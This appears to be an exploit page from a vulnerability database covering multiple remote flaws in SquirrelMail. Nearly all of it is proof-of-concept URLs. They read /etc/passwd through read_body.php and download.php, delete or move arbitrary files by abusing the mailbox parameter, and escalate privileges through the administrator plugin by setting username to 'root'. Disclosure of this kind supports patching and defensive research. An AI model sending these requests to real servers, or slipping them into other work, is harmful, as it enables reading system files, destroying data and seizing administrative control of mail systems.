• info
• discussion
• exploit
• solution
• references

Squirrelmail Multiple Remote Vulnerabilities

The following proof of concept examples have been supplied:

File disclosure:
http://www.example.com/src/read_body.php?mailbox=/etc/passwd&passed_id=1&

File deletion:
http://www.example.com/src/delete_message.php?mailbox=[filehere]&message=1

File moving:
http://www.example.com/src/move_messages.php?msg=1&mailbox=[file_you_want_to_move]&startMessage=1&targetMailbox=[target_mailbox_here]

File download:
http://www.example.com/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd

Privilege escalation:
http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file:plugins/administrator/admins//&off=true&key=$